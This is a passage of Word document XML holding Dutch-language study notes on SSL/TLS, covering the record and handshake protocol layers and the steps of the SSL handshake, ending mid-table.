        <w:t>De encryptieprincipes zijn gelijkaardig tussen beide, maar de manier waarop het certificaat vertrouwd wordt is dus anders!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB5AE85" w14:textId="233F4E3E" w:rsidR="00FE200C" w:rsidRDefault="00385B9E" w:rsidP="00385B9E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:br w:type="column"/>
      </w:r>
      <w:bookmarkStart w:id="10" w:name="_Toc453378499"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SSL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="388C6870" w14:textId="77777777" w:rsidR="009964AB" w:rsidRDefault="009964AB" w:rsidP="009964AB"/>
    <w:p w14:paraId="7D8F6A99" w14:textId="5C3437DC" w:rsidR="009964AB" w:rsidRDefault="00C7078D" w:rsidP="00C7078D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Ontwikkeld door Netscape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2627B414" w14:textId="42D981BA" w:rsidR="00C7078D" w:rsidRDefault="00C7078D" w:rsidP="00C7078D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SSLv3 is de meest gebruikte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4FCF88" w14:textId="5870248E" w:rsidR="00C7078D" w:rsidRDefault="00FB39EC" w:rsidP="00C7078D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>TLS-werkgroep opgericht om SSLv3 te standariseren</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634B3D00" w14:textId="210EA57C" w:rsidR="00FB39EC" w:rsidRDefault="00FB39EC" w:rsidP="00FB39EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>TLS = SSLv3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61374994" w14:textId="0A274DC6" w:rsidR="00FB39EC" w:rsidRDefault="00FB39EC" w:rsidP="00FB39EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>HTTPS = HTTP + SSL (en op poort 443 ipv 80)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F5F0E5" w14:textId="77777777" w:rsidR="00FB39EC" w:rsidRDefault="00FB39EC" w:rsidP="00FB39EC">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="357090B0" w14:textId="68DF34B5" w:rsidR="00FB39EC" w:rsidRDefault="00FB39EC" w:rsidP="00FB39EC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB39EC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55F603BB" wp14:editId="0F1F0F13">
            <wp:extent cx="2640882" cy="2910860"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1016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66" cy="29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91FDE1" w14:textId="77777777" w:rsidR="00FB39EC" w:rsidRDefault="00FB39EC" w:rsidP="00FB39EC">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A550082" w14:textId="51E9D344" w:rsidR="00FB39EC" w:rsidRDefault="00FF6ECC" w:rsidP="00FF6ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SSL gebruikt TCP en bestaat uit 2 lagen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8C8AF1" w14:textId="77777777" w:rsidR="00FF6ECC" w:rsidRDefault="00FF6ECC" w:rsidP="00FF6ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Laag 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046C82FD" w14:textId="03BB096F" w:rsidR="00FF6ECC" w:rsidRDefault="00FF6ECC" w:rsidP="00FF6ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SSL Record Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8035AF" w14:textId="2DF813BE" w:rsidR="00FF6ECC" w:rsidRDefault="00FF6ECC" w:rsidP="00FF6ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Levert beveiligingsservices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73981F5C" w14:textId="211A3BAA" w:rsidR="00FF6ECC" w:rsidRDefault="00FF6ECC" w:rsidP="00FF6ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Beveiligde data transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125AB540" w14:textId="39659E8C" w:rsidR="00FF6ECC" w:rsidRDefault="00FF6ECC" w:rsidP="00FF6ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Laag 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066FA1DB" w14:textId="553389C8" w:rsidR="00FF6ECC" w:rsidRDefault="00FF6ECC" w:rsidP="00FF6ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SSL Handshake Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A111C6" w14:textId="05EA55C5" w:rsidR="00FF6ECC" w:rsidRDefault="00FF6ECC" w:rsidP="00FF6ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SSL Change Cipher Spec Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3539A7FB" w14:textId="4C6B42C2" w:rsidR="00FF6ECC" w:rsidRDefault="00FF6ECC" w:rsidP="00FF6ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SSL Alert Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A650EA" w14:textId="77777777" w:rsidR="000D00AD" w:rsidRDefault="000D00AD" w:rsidP="000D00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3795F" w14:paraId="71A5E190" w14:textId="77777777" w:rsidTr="0093795F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5381" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D544C54" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000D00AD" w:rsidRDefault="0093795F" w:rsidP="0093795F">
            <w:pPr>
              <w:pStyle w:val="Heading3"/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Laag 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26012A07" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000D00AD" w:rsidRDefault="0093795F" w:rsidP="0093795F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="15B61D98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Vertrouwelijkheid</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="069A1BE6" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000D00AD" w:rsidRDefault="0093795F" w:rsidP="0093795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Secret Key #1: AES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="612D0B90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Integriteit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18217852" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000D00AD" w:rsidRDefault="0093795F" w:rsidP="0093795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Secret Key #2: MAC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57118F92" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000D00AD" w:rsidRDefault="0093795F" w:rsidP="0093795F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57BDAD34" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000D00AD" w:rsidRDefault="0093795F" w:rsidP="0093795F">
            <w:p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SSL Record Protocol</w:t>
            </w:r>
            <w:r w:rsidRPr="000D00AD">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="22AA8393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Data fragmenteren en eventueel comprimeren</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02867686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MAC toepassen (hashen met Secret Key #2)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B7D972B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Versleutelen met AES (Secret Key #1)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C1D3813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Header toevoegen en doorsturen naar Transportlaag</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BD3C205" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000D00AD" w:rsidRDefault="0093795F" w:rsidP="00195A43">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5382" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03CB406F" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000D00AD" w:rsidRDefault="0093795F" w:rsidP="0093795F">
            <w:pPr>
              <w:pStyle w:val="Heading3"/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Laag 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2773A430" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000D00AD" w:rsidRDefault="0093795F" w:rsidP="0093795F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1A6E9251" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000D00AD" w:rsidRDefault="0093795F" w:rsidP="0093795F">
            <w:p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SSL Handshake Protocol</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EEFEED7" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000D00AD" w:rsidRDefault="0093795F" w:rsidP="0093795F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="75AA7788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Authenticatie + Overhandelen over cryptoalgoritme</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27B89CE9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Moet OK zijn!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70685DE6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Onbeveiligd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EE736CA" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000D00AD" w:rsidRDefault="0093795F" w:rsidP="0093795F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="372DD580" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000D00AD" w:rsidRDefault="0093795F" w:rsidP="0093795F">
            <w:p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SSL Change Cipher Spec Protocol</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74645B8D" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000D00AD" w:rsidRDefault="0093795F" w:rsidP="0093795F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="49191813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Geeft aan dat de afspraken OK zijn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62BD6173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Beveiligd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16505CBC" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000D00AD" w:rsidRDefault="0093795F" w:rsidP="0093795F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2402579D" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000D00AD" w:rsidRDefault="0093795F" w:rsidP="0093795F">
            <w:p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SSL Alert Protocol</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08E7E82C" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000D00AD" w:rsidRDefault="0093795F" w:rsidP="0093795F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="43C2940F" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000D00AD" w:rsidRDefault="0093795F" w:rsidP="0093795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00AD">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Waarschuwen indien communicatie NOK is bv.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75C7160D" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000D00AD" w:rsidRDefault="0093795F" w:rsidP="00195A43">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09E90B82" w14:textId="77777777" w:rsidR="00FF6ECC" w:rsidRDefault="00FF6ECC" w:rsidP="00195A43"/>
    <w:p w14:paraId="7E2C23D4" w14:textId="77777777" w:rsidR="00195A43" w:rsidRDefault="00195A43" w:rsidP="00195A43"/>
    <w:p w14:paraId="05D93889" w14:textId="112489C2" w:rsidR="00110326" w:rsidRDefault="00214337" w:rsidP="009F0F01">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SSL Handshake Protocol (</w:t>
      </w:r>
      <w:r w:rsidRPr="00214337">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3F69FF" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="0093795F" w:rsidRDefault="0093795F" w:rsidP="009379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25245B" w14:paraId="603F5427" w14:textId="77777777" w:rsidTr="007D2662">
        <w:trPr>
          <w:trHeight w:val="2308"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5381" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="153857F0" w14:textId="0A83E6A2" w:rsidR="0025245B" w:rsidRDefault="0025245B" w:rsidP="00110326">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00110326">
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0133790C" wp14:editId="1AB67E18">
                  <wp:extent cx="2679547" cy="711646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92" cy="729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shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="49B5F498" w14:textId="232CDD56" w:rsidR="0093795F" w:rsidRPr="000C39A0" w:rsidRDefault="0093795F" w:rsidP="0093795F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0099B121" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000C39A0" w:rsidRDefault="0093795F" w:rsidP="0093795F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7D3583D9" w14:textId="77777777" w:rsidR="004A510C" w:rsidRDefault="004A510C" w:rsidP="004A510C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="09100DCD" w14:textId="77777777" w:rsidR="004A510C" w:rsidRDefault="004A510C" w:rsidP="004A510C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2A6033A3" w14:textId="77777777" w:rsidR="007E3E8A" w:rsidRPr="000C39A0" w:rsidRDefault="007E3E8A" w:rsidP="007E3E8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Cilent stuurt Hello</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FF0EDC6" w14:textId="47A9B7F3" w:rsidR="0025245B" w:rsidRPr="000C39A0" w:rsidRDefault="007E3E8A" w:rsidP="007E3E8A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 xml:space="preserve">SSL-versie, Sessie-ID, </w:t>
            </w:r>
            <w:r w:rsidRPr="000C39A0">
              <w:rPr>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Random-number</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5502C6E8" w14:textId="77777777" w:rsidR="007E3E8A" w:rsidRPr="000C39A0" w:rsidRDefault="007E3E8A" w:rsidP="007E3E8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erver stuurt Hello terug</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D924A76" w14:textId="1612C60F" w:rsidR="007E3E8A" w:rsidRPr="000C39A0" w:rsidRDefault="007E3E8A" w:rsidP="007E3E8A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 xml:space="preserve">SSL-versie, Sessie-ID, Gekozen algoritme, compressie, </w:t>
            </w:r>
            <w:r w:rsidRPr="000C39A0">
              <w:rPr>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Random-number</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025245B" w14:paraId="513C6C1A" w14:textId="77777777" w:rsidTr="004A510C">
        <w:trPr>
          <w:trHeight w:val="2867"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5381" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="788C3A5A" w14:textId="64753C5D" w:rsidR="0025245B" w:rsidRDefault="0025245B" w:rsidP="00110326">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5382" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="446AA12C" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000C39A0" w:rsidRDefault="0093795F" w:rsidP="0093795F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="47ED26B7" w14:textId="77777777" w:rsidR="0025245B" w:rsidRPr="000C39A0" w:rsidRDefault="00306763" w:rsidP="0030676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erver stuurt zijn certificaat (met Public Key in)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27A7752C" w14:textId="77777777" w:rsidR="00306763" w:rsidRPr="000C39A0" w:rsidRDefault="00306763" w:rsidP="00306763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Indien geen certificaat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49375DC2" w14:textId="77777777" w:rsidR="00306763" w:rsidRPr="000C39A0" w:rsidRDefault="00306763" w:rsidP="00306763">
            <w:pPr>
              <w:pStyle w:val="ListParagraph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tuurt Server Key Exchange</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C14B10B" w14:textId="77777777" w:rsidR="00306763" w:rsidRPr="000C39A0" w:rsidRDefault="00306763" w:rsidP="00306763">
            <w:pPr>
              <w:pStyle w:val="ListParagraph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Afspraken hoe Master Key gemaakt kan worden</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AB522C7" w14:textId="77777777" w:rsidR="00306763" w:rsidRPr="000C39A0" w:rsidRDefault="00306763" w:rsidP="0030676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erver vraagt Client zijn certificaat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36A774E6" w14:textId="1149428F" w:rsidR="00306763" w:rsidRPr="000C39A0" w:rsidRDefault="00306763" w:rsidP="0030676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erver stuurt Hello Done</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025245B" w14:paraId="0D5A956F" w14:textId="77777777" w:rsidTr="004A510C">
        <w:trPr>
          <w:trHeight w:val="2965"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5381" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="160C0567" w14:textId="22041292" w:rsidR="0025245B" w:rsidRDefault="0025245B" w:rsidP="00110326">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5382" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="698E0F05" w14:textId="77777777" w:rsidR="0025245B" w:rsidRPr="000C39A0" w:rsidRDefault="009F0F01" w:rsidP="009F0F0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Client stuurt zijn certificaat (met Public Key In)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69DEB2DE" w14:textId="77777777" w:rsidR="009F0F01" w:rsidRPr="000C39A0" w:rsidRDefault="009F0F01" w:rsidP="009F0F01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Indien geen certificaat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="354E09A3" w14:textId="77777777" w:rsidR="009F0F01" w:rsidRPr="000C39A0" w:rsidRDefault="009F0F01" w:rsidP="009F0F01">
            <w:pPr>
              <w:pStyle w:val="ListParagraph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‘no certificate’ alert</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AA6CDF2" w14:textId="77777777" w:rsidR="009F0F01" w:rsidRPr="000C39A0" w:rsidRDefault="009F0F01" w:rsidP="009F0F01">
            <w:pPr>
              <w:pStyle w:val="ListParagraph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erver beslist hierna!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58F5FA6F" w14:textId="77777777" w:rsidR="009F0F01" w:rsidRPr="000C39A0" w:rsidRDefault="009F0F01" w:rsidP="009F0F0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Certificaat verification</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7516A6E2" w14:textId="77777777" w:rsidR="009F0F01" w:rsidRPr="000C39A0" w:rsidRDefault="009F0F01" w:rsidP="009F0F01">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:rPr>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000C39A0">
              <w:rPr>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Proof Of Possession</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61541368" w14:textId="77777777" w:rsidR="009F0F01" w:rsidRPr="000C39A0" w:rsidRDefault="009F0F01" w:rsidP="009F0F01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Client maakt hash van alle uitgewisselde messages tot nu toe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="590DCBA3" w14:textId="77777777" w:rsidR="009F0F01" w:rsidRPr="000C39A0" w:rsidRDefault="009F0F01" w:rsidP="009F0F01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erver berekent deze zelf ook en checkt hashes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="684DE635" w14:textId="77777777" w:rsidR="009F0F01" w:rsidRPr="000C39A0" w:rsidRDefault="009F0F01" w:rsidP="009F0F0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Client Key Exchange</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AB7C6DC" w14:textId="77777777" w:rsidR="00D10852" w:rsidRPr="000C39A0" w:rsidRDefault="009F0F01" w:rsidP="009F0F01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Client</w:t>
            </w:r>
            <w:r w:rsidR="00D10852" w:rsidRPr="000C39A0">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> maakt 48-bit Pre Master Secret</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15BEDF55" w14:textId="54FFF71C" w:rsidR="009F0F01" w:rsidRPr="000C39A0" w:rsidRDefault="009F0F01" w:rsidP="009F0F01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Encryptie met Server Public Key</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="479EB83C" w14:textId="77777777" w:rsidR="00C50CD6" w:rsidRPr="000C39A0" w:rsidRDefault="00C50CD6" w:rsidP="00C50CD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Beiden berekenen nu de Master Secret uit de Pre Master Secret</w:t>
            </w:r>
            <w:r w:rsidR="00D10852" w:rsidRPr="000C39A0">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> (met </w:t>
            </w:r>
            <w:r w:rsidR="00D10852" w:rsidRPr="000C39A0">
              <w:rPr>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Randoms</w:t>
            </w:r>
            <w:r w:rsidR="00D10852" w:rsidRPr="000C39A0">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6637FFBB" w14:textId="2F0EC059" w:rsidR="00DE64BF" w:rsidRPr="000C39A0" w:rsidRDefault="00DE64BF" w:rsidP="00C50CD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Beiden berekenen uit de Master Secret de AES en MAC Key</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025245B" w14:paraId="15887BF6" w14:textId="77777777" w:rsidTr="000C39A0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5381" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="67237766" w14:textId="7754D004" w:rsidR="0025245B" w:rsidRDefault="0025245B" w:rsidP="00110326">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5382" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="590232FB" w14:textId="77777777" w:rsidR="0093795F" w:rsidRPr="000C39A0" w:rsidRDefault="0093795F" w:rsidP="0093795F">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1F106991" w14:textId="77777777" w:rsidR="0025245B" w:rsidRPr="000C39A0" w:rsidRDefault="001E1886" w:rsidP="001E188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Client stuurt Change Cipher Spec naar server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E9AC486" w14:textId="77777777" w:rsidR="001E1886" w:rsidRPr="000C39A0" w:rsidRDefault="001E1886" w:rsidP="001E1886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 xml:space="preserve">Vanaf nu dus pas </w:t>
            </w:r>
            <w:r w:rsidRPr="000C39A0">
              <w:rPr>
                <w:b/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>secure connection</w:t>
            </w:r>
          </w:p>
